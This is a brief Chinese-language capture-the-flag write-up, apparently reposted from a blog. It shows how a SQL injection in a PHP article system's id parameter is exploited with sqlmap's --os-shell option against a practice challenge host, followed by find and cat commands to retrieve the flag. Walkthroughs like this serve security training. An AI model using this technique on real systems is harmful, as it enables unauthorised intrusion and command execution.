青少年CTF练习平台 文章管理系统(sqlmap使用os-shell找flag)PHP
题目
点击下一篇出现参数id,单引号报错
找到注入点启动sqlmap
用sqlmap的os-shell执行命令获取flag
python sqlmap.py -u http://challenge.qsnctf.com:32372/?id=1 --os-shell
执行命令查找flag
find / -name flag*
find / -name *flag
发现/flag
目录,拿下FLAG
cat /flag
原文地址:https://blog.csdn.net/2301_77012231/article/details/145201838
免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!